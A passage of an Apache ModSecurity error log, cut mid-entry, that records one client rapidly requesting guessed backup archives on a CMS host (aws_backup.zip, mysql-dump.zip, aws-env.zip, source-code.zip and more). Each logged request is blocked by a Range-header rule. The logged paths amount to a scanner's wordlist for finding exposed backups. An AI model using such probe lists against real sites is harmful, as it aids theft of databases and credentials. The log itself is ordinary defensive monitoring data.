"bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/panel.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6EgAAAJY"] [Sun Mar 08 19:04:39.746955 2026] [:error] [pid 12902:tid 12942] [client 35.189.151.148:42094] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive-4.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAogAAAoc"] [Sun Mar 08 19:04:39.746964 2026] [:error] [pid 29564:tid 29595] [client 35.189.151.148:39914] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/control.zip"] [unique_id "aa2sJwemqWLB0zKFm0TYTgAAARc"] [Sun Mar 08 19:04:39.747162 2026] [:error] [pid 29564:tid 29596] [client 35.189.151.148:44326] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/access_logs.zip"] [unique_id "aa2sJwemqWLB0zKFm0TYTwAAARg"] [Sun Mar 08 19:04:39.747238 2026] [:error] [pid 13473:tid 13533] [client 35.189.151.148:32938] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/files_backup.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6EwAAAIo"] [Sun Mar 08 19:04:39.747255 2026] [:error] [pid 12902:tid 12946] [client 35.189.151.148:44036] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/svn.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAowAAAos"] [Sun Mar 08 19:04:39.747556 2026] [:error] [pid 13473:tid 13552] [client 35.189.151.148:38590] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/main-backup.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6FAAAAJc"] [Sun Mar 08 19:04:39.747679 2026] [:error] [pid 13472:tid 13530] [client 35.189.151.148:42534] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_backup.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8vwAAAFI"] [Sun Mar 08 19:04:39.747774 2026] [:error] [pid 13471:tid 13477] [client 35.189.151.148:42180] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/project_overview.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD34wAAAAI"] [Sun Mar 08 19:04:39.747787 2026] [:error] [pid 7010:tid 7042] [client 35.189.151.148:41700] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/joomla.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-bAAAAYU"] [Sun Mar 08 19:04:39.747801 2026] [:error] [pid 13473:tid 13518] [client 35.189.151.148:44134] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/export.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6FQAAAII"] [Sun Mar 08 19:04:39.747897 2026] [:error] [pid 13472:tid 13528] [client 35.189.151.148:39498] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backend.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8wAAAAFE"] [Sun Mar 08 19:04:39.747990 2026] [:error] [pid 7010:tid 7044] [client 35.189.151.148:37542] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/client.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-bQAAAYc"] [Sun Mar 08 19:04:39.748045 2026] [:error] [pid 13471:tid 13493] [client 35.189.151.148:41214] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/complete-archive.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD35AAAABI"] [Sun Mar 08 19:04:39.748690 2026] [:error] [pid 13471:tid 13487] [client 35.189.151.148:37766] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/microservices.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD35QAAAAw"] [Sun Mar 08 19:04:39.748770 2026] [:error] [pid 12819:tid 12864] [client 35.189.151.148:42446] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-20250101.zip"] [unique_id "aa2sJ_NtUJnAKTO-2_-25wAAAlM"] [Sun Mar 08 19:04:39.748791 2026] [:error] [pid 27307:tid 27327] [client 35.189.151.148:38654] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/profiles.zip"] [unique_id "aa2sJwo1nI2o7tYBWw9SZgAAAVI"] [Sun Mar 08 19:04:39.751692 2026] [:error] [pid 13472:tid 13513] [client 35.189.151.148:60784] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/mysql-dump.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8wQAAAEo"] [Sun Mar 08 19:04:39.751998 2026] [:error] [pid 13471:tid 13496] [client 35.189.151.148:60502] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/tls.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD35gAAABU"] [Sun Mar 08 19:04:39.752025 2026] [:error] [pid 13471:tid 13480] [client 35.189.151.148:39640] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/authorization.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD35wAAAAU"] [Sun Mar 08 19:04:39.752627 2026] [:error] [pid 13472:tid 13505] [client 35.189.151.148:60472] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/final.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8wgAAAEM"] [Sun Mar 08 19:04:39.755012 2026] [:error] [pid 13471:tid 13491] [client 35.189.151.148:59910] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/parameters.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD36AAAABA"] [Sun Mar 08 19:04:39.755164 2026] [:error] [pid 13472:tid 13535] [client 35.189.151.148:60092] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sandbox.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8wwAAAFQ"] [Sun Mar 08 19:04:39.755284 2026] [:error] [pid 13605:tid 13616] [client 35.189.151.148:32930] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/source-code.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfmgAAAMk"] [Sun Mar 08 19:04:39.755793 2026] [:error] [pid 13472:tid 13521] [client 35.189.151.148:37090] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_4.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8xAAAAE4"] [Sun Mar 08 19:04:39.755799 2026] [:error] [pid 13471:tid 13485] [client 35.189.151.148:40556] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup/backup.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD36QAAAAo"] [Sun Mar 08 19:04:39.755816 2026] [:error] [pid 7010:tid 7037] [client 35.189.151.148:42140] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/htdocs_backup.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-bgAAAYA"] [Sun Mar 08 19:04:39.757502 2026] [:error] [pid 13471:tid 13494] [client 35.189.151.148:41266] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sql_export.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD36gAAABM"] [Sun Mar 08 19:04:39.757612 2026] [:error] [pid 12902:tid 12950] [client 35.189.151.148:38372] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/universal.zip"] [unique_id "aa2sJ2aTUOdovAC89_RApAAAAo8"] [Sun Mar 08 19:04:39.757649 2026] [:error] [pid 13471:tid 13481] [client 35.189.151.148:38162] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/private.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD36wAAAAY"] [Sun Mar 08 19:04:39.760118 2026] [:error] [pid 11078:tid 11129] [client 35.189.151.148:38518] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/html_backup.zip"] [unique_id "aa2sJ3-dmvIeGeY060kilQAAAdM"] [Sun Mar 08 19:04:39.760120 2026] [:error] [pid 13472:tid 13539] [client 35.189.151.148:43414] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-database.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8xQAAAFY"] [Sun Mar 08 19:04:39.760137 2026] [:error] [pid 13472:tid 13509] [client 35.189.151.148:44096] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/siteground.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8xgAAAEY"] [Sun Mar 08 19:04:39.760298 2026] [:error] [pid 13472:tid 13525] [client 35.189.151.148:42596] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/legal.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8xwAAAFA"] [Sun Mar 08 19:04:39.760423 2026] [:error] [pid 13605:tid 13622] [client 35.189.151.148:38338] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive-0.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfmwAAAM8"] [Sun Mar 08 19:04:39.760488 2026] [:error] [pid 13472:tid 13503] [client 35.189.151.148:37290] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_production.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8yAAAAEE"] [Sun Mar 08 19:04:39.760790 2026] [:error] [pid 13471:tid 13499] [client 35.189.151.148:41138] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-1.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD37AAAABg"] [Sun Mar 08 19:04:39.761078 2026] [:error] [pid 13471:tid 13492] [client 35.189.151.148:38408] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/daily_backup.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD37QAAABE"] [Sun Mar 08 19:04:39.761354 2026] [:error] [pid 13471:tid 13483] [client 35.189.151.148:43980] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-env.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD37gAAAAg"] [Sun Mar 08 19:04:39.761812 2026] [:error] [pid 13471:tid 13494] [client 35.189.151.148:44078] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/standard.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD37wAAABM"] [Sun Mar 08 19:04:39.762607 2026] [:error] [pid 13472:tid 13504] [client 35.189.151.148:41604] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/reports.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8yQAAAEI"] [Sun Mar 08 19:04:39.762610 2026] [:error] [pid 13471:tid 13495] [client 35.189.151.148:44758] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] 